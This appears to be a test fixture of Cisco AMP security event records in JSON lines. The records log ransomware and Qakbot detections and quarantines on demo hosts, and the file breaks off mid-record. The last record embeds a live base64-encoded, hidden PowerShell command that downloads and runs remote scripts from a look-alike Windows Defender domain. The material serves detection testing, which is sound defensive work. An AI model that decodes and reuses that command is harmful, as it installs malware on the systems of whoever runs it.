Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvA